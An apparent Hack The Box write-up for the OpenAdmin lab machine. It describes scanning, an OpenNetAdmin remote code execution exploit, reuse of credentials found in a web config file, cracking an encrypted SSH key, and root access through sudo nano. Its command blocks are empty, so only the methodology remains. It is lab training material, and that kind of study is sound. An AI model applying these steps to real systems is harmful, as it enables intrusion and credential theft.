HTB - OpenAdmin without MetaSploit
Intro
The importance to also patch your “applications”, and not just your services.
Target
Recon
Again, this is an HTB box, so recon is mainly active, and I feel like active recon == enum.
Still, we can check :
- Name of the box : OpenAdmin ;
- OS “type”, : Linux :
- Hints given on HTB website, information section :
Enum
As always, we start with an nmap scan :
|
|
|
|
We find 2 services : ssh and Apache, both on standard ports. I like to check searchsploit
for every service + version I find, in order to see if there any big vulnerability. In general, SSH isn’t something that I"ll try to attack right away. It is more of a “last chance” path, with brute force.
Web scanning
In our case, we found a web server running Apache, but th version doesn’t seem vulnerable. So, let’s fire nikto
and dirbuster
:
|
|
And dirbuster like so :
Dirbuster, will find an interesting dir “ona”, browsing to this resource we discovered it is running OpenNetAdmin version 18.1.1 which is outdated and probably vulnerable…
Indeed, after a quick search, we discover that it is vulnerable to Remote Code Execution (RCE), one of the most dangerous vuln we could find. Awesome!
Exploitation
Getting initial shell
The vuln in question can be found here : https://www.exploit-db.com/exploits/47691 it is a simple Python script that will grant you a shell access on the remote machine.
Unfortunately, this shell only runs as www-data
, the default Apache
user and with /sbin/nologin
shell. Still, we can still look around. I usually check what files I have access to :
|
|
Let’s check who was access to sudo :
|
|
I also like to check what users are on the system and see if I can access some files inside their home’s folders :
|
|
And of course in our case, explore the web root folders.
Doing so, we discover two users : joanna
and jimmy
and an interesting set of credentials inside /var/www/html/local/ona/config
.
It happens that the password from this file is actually jimmy’s account SSH password. We now have a real bash shell, in a real terminal, with bash completion, hurray!
Once again, we check for common stuff, like what files do we own, and sudo rights :
|
|
So, no sudo rights for us, however, we discover a new website that only runs on localhost. This website is very important, as we can see that, once logged as Jimmy, it will send us the SSH private key of Joanna.
I decided to create an SSH tunnel :
|
|
And to modify the login page in order to get rid of authentication :
|
|
becomes :
|
|
We can now browse to 127.0.0.1:52846 and log in with jimmy
// plop
.
And bingo! We got Joanna’s key with an extra tip :
Don’t forget your “ninja” password
Of course, Joanna-s key is encrypted… We save it as id_joanna and hash it :
|
|
Now that we have the hashed version, time to crask it :
|
|
We finally, have joanna’s ssh key password, we can now connect to the server as her!
PrivEsc
As usual, we do all our basic checks. Doing so, we will notice :
- We have access to user.txt flag ;
- We have access to
sudo /bin/nano /opt/priv
without password.
Accessing root password which is always located in /root/root.txt
is a simple matter of running nano
as root (with sudo
) and entering command mode with ^R
+ ^X
to cat
the flag file).
We now got root.txt
!
Outro
As we have just seen, one can obtain root access to a machine via “third party” application while the rest of the system is up to date. So, make sure to keep everything updated!